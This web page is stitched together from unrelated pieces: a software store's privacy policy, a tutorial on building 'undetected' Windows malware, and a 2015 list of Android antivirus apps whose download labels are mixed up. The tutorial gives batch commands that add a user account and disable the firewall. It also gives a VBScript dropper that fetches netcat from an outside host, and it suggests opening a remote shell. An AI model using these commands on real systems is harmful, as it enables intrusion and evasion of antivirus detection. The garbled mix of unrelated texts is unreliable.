Collection of Information
This Site collects a variety of personal information. Personal information such as name, address, e-mail address, telephone number, and other information may be collected from you in order to, among other things: (i) respond to a request for additional information about Software-onlinestore or e-on software products/services; (ii) provide you with assistance in the use of TeezSoft products/services; (iii) permit you to download information or data or products from this Site; (iv) customize and enhance your visits to this Site; (v) report a problem with this Site; (vi) enter a survey or contest or participate in a promotion. Our goal is to inform you of the personal information we are collecting and the purposes for which we wish to use such information. We will seek your clear consent to your personal information being used for the stated purposes and will only collect such information as is reasonably necessary to achieve those purposes. Software-onlinestore will clearly inform you as to information that it requires to proceed with said purpose and information that is merely optional. If you elect not to provide required information TeezSoft may not be able to comply with your request or provide certain services.
If you contact TeezSoft, we may keep a record of that correspondence. When you purchase or download products/services from the online store area of this Site, Software-onlinestore and/or e-on software’s e-commerce service provider(s) will collect your personal information in order to process such order(s). Our online store is designed to protect your credit card information, name, address, email and any other information that you provide us with. TeezSoft servers are equipped with industry standard security measures such as SSL encryption. The personal information which Software-onlinestore software holds will be held securely in accordance with Software-onlinestore software’s internal security policy and the law. You may also place an order with a representative over the telephone by calling us at 866-341-4366 (North America), by sending your order by fax using the order forms or by contacting one of our resellers directly.
This Site logs IP addresses and browser information for purposes of system administration, identification of technical difficulties, evaluation of traffic patterns and Site usage, and otherwise providing content relevant to visitors of this Site.
Use, Disclosure, and Sharing of Personal Information
Under no circumstances will your personal information be sold or generally distributed.
Software-onlinestore software and/or its resellers, representatives, third party developers and/or sponsors periodically send out information regarding upcoming industry events, promotions, marketing activities, product releases and features. By submitting information to this Site, you expressly agree that your information may be transferred to these parties and that this information may be used for such purposes. When TeezSoft wishes to use personal information that has been collected for a new purpose not previously identified herein, the new purpose shall be identified prior to use. Unless the new purpose is required by law, your consent shall be obtained before the information is used for the new purpose.
TeezSoft reserves the right to use aggregated data (data that is not individually identifiable). Such aggregate uses could include, but are not limited to, meeting TeezSoft’s marketing and business objectives.
Accessing, Modifying, or Removing Information
Under applicable laws, statutes, regulations, or ordinances, you have the right to (i) check whether TeezSoft holds personal information collected about you through this Site, (ii) access such personal information, and (iii) correct any personal information about you that is inaccurate. If you would like Software-onlinestore to update or delete your information from Software-onlinestore’s records, please contact Software-onlinestore’s Online Support Services. You can directly modify or remove your registration information yourself using our Secure Online Registration service. Software-onlinestore will require reasonable proof of your identity before letting you access or modify your personal information.
Security and Integrity
This Site is a general audience site which is neither designed nor intended to collect personal information from children who are under the age of 13. In order to ensure compliance with the provisions of the Children’s Online Privacy Protection Act children under the age of 13 should not provide any personal information to this site. We ask that parents supervise their children while online.
The personal information that is collected by Software-onlinestore software is considered to be an asset. In the event that Software-onlinestore software, any affiliated company, division or portions of its assets are acquired by another company, such information may be one of the transferred assets. We will take reasonable steps to place a notification of such a transfer on this Site.
This article will demonstrate how an average PC user can create a piece of malicious software in minutes that will be undetected by all the major anti-malware scanning engines.
This article is for informational purposes only and the author disclaims any responsibility for your use or misuse of any of the information contained herein.
It is well-known in blackhat circles that a new piece of malware, coded from scratch, will almost always bypass signature-based malware scanners. What is less known is that the skill needed to do this is minimal at best – an average user with no programming experience can cut and paste a few lines of code together and create a undetected malicious executable in 3 easy steps.
Most anti-virus scanners rely on a database of signatures for known viruses. Once a new virus is spread wide enough that it has been identified as malicious, the anti-virus vendors scramble to come up with a fingerprint to identify that strain of malware in the future. The obvious flaw in this process is that a new piece of malware will bypass the scanners by default, until it is widespread enough to be noticed by security researchers or picked up by a dummy node. There is always a window of opportunity for new malware between the time of deployment and the update of the signature databases and as recent malware trends demonstrate, this window is large enough to make a profit for the authors.
Roll-your-own undetected malware in 3 easy steps!
Step 1: Commands to execute
Here we compile the DOS commands that our malware will execute into a DOS batch file. As a simple proof of concept, let’s add a new user, disable the XP firewall, and create a directory on the C drive.
net user hacksafe hacksafe /add
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
Save the above as a filename.bat
Step 2: Compile to an executable
Experienced DOS users may remember a number of utilities that were able to convert a batch file into an executable (com or exe). These tools basically wrap a shell call around each of our commands and bundle the whole thing up into a tiny .exe file. One of the most well known is BAT2EXEC released by PC Magazine in 1990.
Our tiny executable COM file is ready to go.
Step 3: Test and Deploy
We now have a custom executable that runs some obvoiusly malicious commands: disabling the firewall and adding a new user. If we were to email this file to a target, surely any modern anti-virus scanner would pick this up as a simple batch file and alert us to the malicious code… right?
No patterns exist for this new piece of malware – it’s unrecognised by signature-based scanners. Heuristics and sandboxing may alert to suspicious activity, or email filtering may prevent our executable from reaching the target, but the primary mechanism of anti-malware protection has been defeated in a matter of seconds with little knowledge or skill on the part of the attacker. If the target user were to run our executable, the only indication of malicious activity would be a command prompt quickly appearing and disappearing on the desktop.
Step 4 (Optional):
A typical malware author would take the created executable and mangle it in various ways to make it harder to detect – using tools such as encrypters, packers, scramblers and EXE binders. The malicious code may be bundled with a legitimate executable, or packed with a rootkit or other remote access utility. For more information on how malware authors avoid detection, check out our article on packers and scramblers.
Example: Creating a simple dropper
A dropper is a small piece of malware designed to “drop” another peice of malware onto a system. It usually comes in the form of a simple executable that, when executed, retrieves a file from a hardcoded web or ftp site and executes it (usually a rootkit or botnet suite).
As a proof of concept, we can create a simple dropper using VBscript in a batch file that pulls down a copy of netcat from the Hacksafe site and executes it:
echo Dim DataBin >hacksafe.vbs
echo Dim HTTPGET >>hacksafe.vbs
echo Set HTTPGET = CreateObject(”Microsoft.XMLHTTP”) >>hacksafe.vbs
echo HTTPGET.Open “GET”, “http://www.hacksafe.com.au/nc.exe“, False>>hacksafe.vbs
echo HTTPGET.Send >>hacksafe.vbs
echo DataBin = HTTPGET.ResponseBody >>hacksafe.vbs
echo Const adTypeBinary=1 >>hacksafe.vbs
echo Const adSaveCreateOverWrite=2 >>hacksafe.vbs
echo Dim test1 >>hacksafe.vbs
echo Set test1 = CreateObject(”ADODB.Stream”) >>hacksafe.vbs
echo test1.Type = adTypeBinary >>hacksafe.vbs
echo test1.Open >>hacksafe.vbs
echo test1.Write DataBin >>hacksafe.vbs
echo test1.SaveToFile “malware.exe”, adSaveCreateOverWrite >>hacksafe.vbs
We compile using one of the many bat conversion utilities – Bat-to-Exe Converter 1.1. (This utility packs the output file using UPX, which may cause some anti-virus scanners to flag the file as potentially suspicious).
After creating our simple dropper.exe we submit it for scan:
Nothing found. It would be trivial to include the firewall disable command from the previous example and configure a netcat command line to listen on an incoming port and spawn a command shell. A new, undetected yet incredibly simple and obvious, remote access trojan!
It is hoped that this article serves to demonstrate the fundamental flaw of signature-based malware detection systems.
Some additional points to consider:
A .COM file under 64kb can be renamed to an .EXE (or .scr, or .lnk, etc) and will still execute.
Heuristics and behaviour analysis may detect malicious activity.
The examples above assume XP sp2 and the user has local admin privileges.
Many bat2exe utilities use a packer or scrambler that is recognised by signatures.
Anyone with programming experience can see that the above can be achieved using execve(), system().
This is old, old news. People were hacking BBS’s using BAT2EXE in the early 90’s!
Best Android Antivirus 2015
A list of Best Android Antivirus 2015 for Android Mobile Phones is now available for all android users that they can use free version and premium version. They can get these antivirus from play store or antivirus official sites. Due to increasing demand of android devices there is s need to secure android devices with top and highly safe antivirus that will safeguard their android devices while using it, in background. It is important, bacause these viruses may cause serious damage to our devices, by not only deleting our personal files, but also disturbing whole device. So we have got a list of Best Android Antivirus 2015 for Android Users.
Need of Antivirus:
Due to invention of new Dendroid virus that is damaging most of android cell phones in india and other countries. Due to emerging security risks there was a need to secure android cell phones, that may help to secure android OS completely with confidence. There are dozens of android security tools and antivirus tools that are used now a days, but after buying a premium service which is best android antivirus for 2015, it will be discussed here, so that you may buy 2015 best Android Antivirus for your device.
List of 2015 Best Antivirus For Android:
1. AVG Antivirus – 2015 Best Antivirus:
AVG Antivirus for Android Devices is considered at top in 2015 Android Antivirus applications. These are only suitable for Android tablets and phones, and not suitable for PC. This available for free and Its user rating is 4.4.
Features of AVG Antivirus:
Deep Scanning of media files and apps in real time.
Find lost phone by using this Best android antivirus 2015 app.
Lock your privacy in few minutes to protect you data.
Amazing task manager, that manages apps by their usage.
Download AVG Antivirus for Android Apk file:
Play Store | Website
2. 360 Security Antivirus– (Free Version)
360 Security Antivirus is a free and best Best android antivirus 2015. Android User have rated 360 Security Antivirus at 4.4 and it is ranked 2nd. Its main actions are also ultimate scanning of files and remove infected files that may be harmful for android devices.
360 Security Antivirus Features:
Extensive scan of Device and shutting down all the non working apps.
Removing internet and device Usage history in few clicks.
Smart and easy cleaning of apps. deletes apps safely to help to protect your device
Block disturbing and unknown calls that you don’t want to listen, or if you are sick of someone.
360 Security Apk Free Download: Play Store or | Official Website
3. Avast Mobile Security – (Free)
Avast Mobile security is considered as Best Android Security 2015 to protect your device in both conditions either online or offline. On play store, Avast mobile security has got 4.4 rating by its users. It gives security as well as smart cleaning of virus or infected files in few seconds.
Avast Mobile Security Features:
Remove spyware, virus, and malware very easily with just few clicks.
Latest and advanced modified anti-theft device that will help to safeguard your data.
Find your lost mobile by using Avast Mobile Security easily.
Other features are firewall, app manager and network meter.
Download 360 Security: Play Store | Website
4. NQ Mobile Security – (Free) Android Phones Antivirus 2015:
NQ Mobile Security is an award winning antivirus tool and it is best antivirus for android mobile phones in 2015. It has got 4.4 users rating on google play store. This Top android antivirus offers awesome Android devices security.
NQ Mobile Security New Features:
use its advanced uninstall manager to safely uninstall apps.
Best Android internet security tool.
360 Security for Android: Play Store | Website
5. Dr. Web Antivirus Light – Best Android Phones Antivirus 2015 (Free)
This is one of the best antivirus android tool suitable for android devices. The ratings for this tool is about 4.4 on the Google play store.
Features of Dr. Web Antivirus Light
The exciting feature like real time file scanning using the SplDer Guard monitor is something to watch out for.
It protects the SD card from various virus and avoid getting infected.
It helps in recovering deleting data from devices and their SD card.
The anti-virus protection features present in this tool makes it one of the best anti-virus tool in 2015.